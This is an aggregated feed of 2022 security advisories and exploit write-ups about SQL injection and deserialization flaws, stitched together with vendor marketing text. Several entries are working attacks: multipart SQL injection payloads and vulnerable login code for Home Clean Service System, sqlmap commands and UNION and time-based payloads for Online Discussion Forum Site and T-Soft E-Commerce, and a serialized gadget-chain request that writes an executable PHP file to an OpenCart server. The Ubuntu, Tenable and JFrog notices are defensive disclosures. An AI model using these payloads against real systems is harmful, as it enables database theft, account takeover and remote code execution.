In Home Clean Service System 1.0, the password parameter is vulnerable to SQL injection attacks.

**Home Clean Service System****Vendor**

**Description:**

The password parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the password parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system.

Status: CRITICAL

\[+\] Payloads:

\--\-
Parameter: MULTIPART email ((custom) POST)
    Type: boolean\-based blind
    Title: OR boolean\-based blind \- WHERE or HAVING clause (NOT)
    Payload: \--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="email"

uufQHiPr@namaikatiputkata.net' OR NOT 6564=6564-- aWQp
\------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
\--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="login"

\--\----WebKitFormBoundary8kMPLwTOJeesgEBx--

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: \--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="email"

uufQHiPr@namaikatiputkata.net' AND (SELECT 6279 FROM(SELECT COUNT(\*),CONCAT(0x7176716271,(SELECT (ELT(6279=6279,1))),0x716a767871,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)-- LSfT
\------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
\--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="login"

\--\----WebKitFormBoundary8kMPLwTOJeesgEBx--

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: \--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="email"

uufQHiPr@namaikatiputkata.net' AND (SELECT 4830 FROM (SELECT(SLEEP(5)))kgBM)-- GxTm
\------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
\--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="login"

\--\----WebKitFormBoundary8kMPLwTOJeesgEBx--
\--\-

**Vulnerable code:**

<?php
	session\_start();
	$username = $\_POST\['username'\];
	$password = $\_POST\['password'\];
	if(ISSET($\_POST\['login'\])){
		$conn = new mysqli("localhost","root","","activity") or die(mysqli\_error());
		$query = $conn\->query("SELECT \*FROM \`admin\` WHERE \`username\` = '$username' && \`password\` = '$password'") or die(mysqli\_error());
		$fetch = $query\->fetch\_array();
		$valid = $query\->num\_rows;
			if($valid > 0){
				$\_SESSION\['admin\_id'\] = $fetch\['admin\_id'\];
				header("location:./dashboard.php");
			}else{
				echo "<script>alert('Invalid username or password')</script>";
				echo "<script>window.location = 'index.php'</script>";
			}
		$conn\->close();
	}	

**Reproduce:**

href

**Proof and Exploit:**

href

CVE-2022-30052: CVE-nu11secur1ty/vendors/acetech/2022/Home-Clean-Service-System at main · nu11secur1ty/CVE-nu11secur1ty

Improper Update of Reference Count vulnerability in net/sched of Linux Kernel allows local attacker to cause privilege escalation to root. This issue affects: Linux Kernel versions prior to 5.18; version 4.14 and later versions.

CVE-2022-29581: 🐧🕺

Ubuntu Security Notice 5424-1 - It was discovered that OpenLDAP incorrectly handled certain SQL statements within LDAP queries in the experimental back-sql backend. A remote attacker could possibly use this issue to perform an SQL injection attack and alter the database.

==========================================================================  
Ubuntu Security Notice USN-5424-1  
May 17, 2022

openldap vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 21.10  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

OpenLDAP could be made to perform arbitrary modifications to the database.

Software Description:  
- openldap: Lightweight Directory Access Protocol

Details:

It was discovered that OpenLDAP incorrectly handled certain SQL statements  
within LDAP queries in the experimental back-sql backend. A remote attacker  
could possibly use this issue to perform an SQL injection attack and alter  
the database.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  slapd                           2.5.11+dfsg-1~exp1ubuntu3.1

Ubuntu 21.10:  
  slapd                           2.5.6+dfsg-1~exp1ubuntu1.1

Ubuntu 20.04 LTS:  
  slapd                           2.4.49+dfsg-2ubuntu1.9

Ubuntu 18.04 LTS:  
  slapd                           2.4.45+dfsg-1ubuntu1.11

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5424-1  
  CVE-2022-29155

Package Information:  
  https://launchpad.net/ubuntu/+source/openldap/2.5.11+dfsg-1~exp1ubuntu3.1  
  https://launchpad.net/ubuntu/+source/openldap/2.5.6+dfsg-1~exp1ubuntu1.1  
  https://launchpad.net/ubuntu/+source/openldap/2.4.49+dfsg-2ubuntu1.9  
  https://launchpad.net/ubuntu/+source/openldap/2.4.45+dfsg-1ubuntu1.11

Ubuntu Security Notice USN-5424-1

Online Discussion Forum Site version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: Online Discussion Forum Site 1.0 - 'id' Blind SQL Injection# Date: 15/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Vulnerable Code:line 3 in file "/odfs/posts/view_post.php"$qry = $conn->query("SELECT p.*, u.username, u.avatar, c.name as `category` FROM `post_list` p inner join category_list c on p.category_id = c.id inner join `users` u on p.user_id = u.id where p.id= '{$_GET['id']}'");# Sqlmap command:sqlmap -u 'http://localhost/odfs/?id=1&p=posts/view_post' -p id --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=1' AND 5178=5178-- Iddj&p=posts/view_post    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1' AND (SELECT 6535 FROM (SELECT(SLEEP(5)))amvG)-- ikmN&p=posts/view_post    Type: UNION query    Title: Generic UNION query (NULL) - 12 columns    Payload: id=-3669' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71716a7671,0x65776b4d4272577956694c6549674a64546761564c79566d556255634a426c7a66464e6e527a4779,0x71767a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&p=posts/view_post

Online Discussion Forum Site 1.0 SQL Injection

OpenCart So Listing Tabs component versions 2.2.0 and below suffer from a deserialization vulnerability that can allow for arbitrary file writes.

    [-] Affected Versions:Version 2.2.0 is affected, and prior versions are likely affected too.[-] Vulnerabilities Description:Vulnerable component is switching to another tab. To exploitvulnerability, an attacker may send a POST request (withapplication/x-www-form-urlencoded content-type) to AJAX endpoint(usually "/index.php") with "is_ajax_listing_tabs" parameter set to"1" and "setting" parameter containing a PHP-serialized object,which would be deserialized at server-side. Gadget-chains based on PHPserver-side code can be used to gain remote code execution, filewrite, DOS, etc.So Listing Tabs is an Opencart plugin, so the Opencart PHP classes areavailable in webapp lifecycle. In source code of Opencart there is a PHPgadget-chain which allows to write a file to the server.Using this gadget, an attacker can write .php files with PHP code insideapp's web root and then execute it via requesting them, thus gainingremote codeexecution, which makes insecure deserialization in So Listing Tabsespecially dangerous. Ability to write files can also be used to DOS thesystem by writing large files and exhausting disk space, it can be used toperform XSS attacks by creating HTML files inside web root.Here is an example of request which will write PHP file on serverin /tmp directory:---POST /index.php HTTP/2Host: 0.0.0.0Content-Length: 3870Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://0.0.0.0/is_ajax_listing_tabs=1&ajax_reslisting_start=0&categoryid=p_date_added&setting=a%3a74%3a{s%3a6%3a"action"%3bs%3a9%3a"save_edit"%3b......s%3a2%3a"aa"%3bO%3A9%3A%22DB%5CMySQLi%22%3A1%3A%7Bs%3A21%3A%22%00DB%5CMySQLi%00connection%22%3BO%3A7%3A%22Session%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00adaptor%22%3BO%3A21%3A%22Twig_Cache_Filesystem%22%3A2%3A%7Bs%3A32%3A%22%00Twig_Cache_Filesystem%00directory%22%3BN%3Bs%3A30%3A%22%00Twig_Cache_Filesystem%00options%22%3BN%3B%7Ds%3A13%3A%22%00%2A%00session_id%22%3Bs%3A11%3A%22%2Ftmp%2Fff.php%22%3Bs%3A4%3A%22data%22%3Bs%3A24%3A%22%3C%3Fphp+system%28%22ls+%2F%22%29%3B+%3F%3E%22%3B%7D%7D}&lbmoduleid=157---[-] Solution:No official solution is currently available.[-] Disclosure Timeline:[28/01/2022] - CVE number assigned[31/01/2022] - Vendor contacted[02/02/2022] - Vendor asked for description of vulnerability[02/02/2022] - Send report to vendor[11/02/2022] - Vendor contacted for asking about updates[11/02/2022] - Vendor answered that did not get the report[11/02/2022] - Send report again[16/02/2022] - Vendor contacted to ask about receiving the report[17/02/2022] - Automatic generated answer about overloaded system[07/04/2022] - Vendor contacted again asking for updates[15/05/2022] - Vendor contacted to notify about public disclosure[16/05/2022] - Vendor contacted to notify about public disclosure toenother email[16/05/2022] - Public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the id CVE-2022-24108 to these vulnerabilities.[-] Credits:Vulnerability discovered by    Denis Mironov (SolidSoft LLC),    Alexey Smirnov (SolidSoft LLC),    Daniil Sigalov (SolidSoft LLC),    Dmitry Pavlov (SolidSoft LLC),    Maxim Malkov (SolidSoft LLC)

OpenCart So Listing Tabs 2.2.0 Unsafe Deserialization

T-Soft E-Commerce version 4 suffers from a remote SQL injection vulnerability.

    # Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated)# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/TW)# Software Homepage: https://www.tsoft.com.tr/# Version : v4# Tested on: Kali Linux# Category: WebApp# Google Dork: N/A# CVE: 2022-28132# Date: 18.02.2022######## Description ###############################################  Step-1: Login as Admin or with privilage user#  Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path#  Step-3: Capture the request save as .txt#  Step-4: Run SQLMAP with this command 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment' --random-agent'#  Step-5: Now you're be able to see the dbs for more search 'how to use sqlmap advance'##  Impact: Attacker can see the what have in database and it's big impact and attacker can stole datas...# ########## Proof of Concept ########################################========>>> REQUEST <<<=========GET /Y/Moduller/_Urun/Json.php?_dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 HTTP/2Host: domain.comCookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxx@xx.com; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Sec-Ch-Ua-Platform: "Linux"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://domain.com/srv/admin/products/products-v2/indexAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9=============> RESULTS OF THE SQLMAP <==========================Parameter: SatisAlt (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20---back-end DBMS: MySQL 5available databases [2]:[*] d25082_db[*] information_schema[13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable

T-Soft E-Commerce 4 SQL Injection

Metasonic Doc WebClient 7.0.14.0 / 7.0.12.0 / 7.0.3.0 is vulnerable to a SQL injection attack in the username field. SSO or System authentication are required to be enabled for vulnerable conditions to exist.

_All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

Tenable Advisory ID

TRA-2022-17

CVSSv3 Base / Temporal Score

CVSSv3 Vector

AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N

Affected Products

Metasonic Doc WebClient 7.0.14.0 / 7.0.12.0 / 7.0.3.0

****FREE FOR 30 DAYS****

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

 BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Nessus Professional Free**

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

**Buy Nessus Professional**

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

FREE FOR 30 DAYS

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable.io Web Application Scanning**

FREE FOR 30 DAYS

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

**Buy Tenable.io Web Application Scanning**

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable.io Container Security**

FREE FOR 30 DAYS

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

**Buy Tenable.io Container Security**

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

**Thank You**

Thank you for your interest in the Tenable.io Container Security program. A representative will be in touch soon.

**Try Tenable Lumin**

FREE FOR 30 DAYS

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable.sc**

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable.ot**

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Thank You**

Thank you for your interest in Tenable.ot. A representative will be in touch soon.

**Request a demo of Tenable.ad**

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Try Tenable.cs**

FREE FOR 30 DAYS Enjoy full access to detect and fix cloud infrastructure misconfigurations in the design, build and runtime phases of your software development lifecycle.

**Buy Tenable.cs**

Contact a Sales Representative to learn more about Cloud Security and how you can secure every step from code to cloud.

**Thank You**

Thank you for your interest in Tenable.cs. A representative will be in touch soon.

**See Tenable.ep In Action**

Know the exposure of every asset on any platform.

CVE-2022-1731: Metasonic Doc WebClient SQL Injection

The Pricing Table WordPress plugin before 3.6.1 fails to properly sanitize and escape user supplied POST data before it is being interpolated in an SQL statement and then executed via an AJAX action available to unauthenticated users

CVE-2022-0867

JFrog Artifactory before 7.36.1 and 6.23.41, is vulnerable to Insecure Deserialization of untrusted data which can lead to DoS, Privilege Escalation and Remote Code Execution when a specially crafted request is sent by a low privileged authenticated user due to insufficient validation of a user-provided serialized object.

 Subscribe to the RSS Feed |  SUPPORT

JFrog takes the privacy and security of its customers very seriously and always strives to provide prompt notification and remediation of any vulnerabilities discovered on JFrog products. As a CVE Numbering Authority (CNA), JFrog assigns CVE identification numbers to newly discovered security vulnerabilities.

Severity

CVE

Summary

Product

Versions

Published

Updated

HIGH

**CVE-2021-3860**

JFrog Artifactory prior to version 7.25.4 (Enterprise+ deployments only), is vulnerable to Blind SQL  Injection by a low privileged authenticated user due to incomplete validation when performing an SQL query.

Artifactory

*   Versions prior to 7.25.4
*   Versions prior to 6.23.30

12/15/2021

12/15/2021

MEDIUM

**CVE-2021-45074**

JFrog Artifactory prior to7.29.3 and 6.23.38, is vulnerable to Broken Access Control, a low-privileged user is able to delete other known users OAuth token, which will force a reauthentication on an active session or in the next UI session.

Artifactory

*   Versions prior to 7.29.3
*   Versions prior to 6.23.38

03/02/2022

03/02/2022

LOW

**CVE-2021-46270**

JFrog Artifactory prior to 7.31.10, is vulnerable to Broken Access Control where a project admin user is able to list all available repository names due to insufficient permission validation.

Artifactory

*   Versions prior to 7.31.10

03/02/2022

03/02/2022

HIGH

**CVE-2022-0573**

JFrog Artifactory prior to 7.36.1 and 6.23.41, is vulnerable to Insecure Deserialization of untrusted data which can lead to DoS, Privilege Escalation, and Remote Code Execution when a specially crafted request is sent by a low privileged authenticated user due to insufficient validation of a user-provided serialized object.

Artifactory

*   Versions prior to 7.36.1
*   Versions prior to 6.34.41

12/5/2022

12/5/2022

MEDIUM

**CVE-2021-45730**

JFrog Artifactory prior to 7.31.10, is vulnerable to Broken Access Control where a Project Admin is able to create, edit and delete Repository Layouts while Repository Layouts configuration should only be available for Platform Administrators. 

Artifactory

Versions prior to 7.31.10

18/5/2022

18/5/2022

MEDIUM

**CVE-2021-41834**

JFrog Artifactory prior to versions 7.28.0 and 6.23.38, is vulnerable to Broken Access Control, the copy functionality can be used by a low-privileged user to read and copy any artifact that exists in the Artifactory deployment due to improper permissions validation.

Artifactory

*   Versions prior to 7.28.0
*   Versions prior to 6.23.38

18/5/2022

18/5/2022

CVE-2022-0573: JFrog Security Advisories - JFrog

The Visual Slide Box Builder WordPress plugin through 3.2.9 does not sanitise and escape various parameters before using them in SQL statements via some of its AJAX actions available to any authenticated users (such as subscriber), leading to SQL Injections

Tag

#sql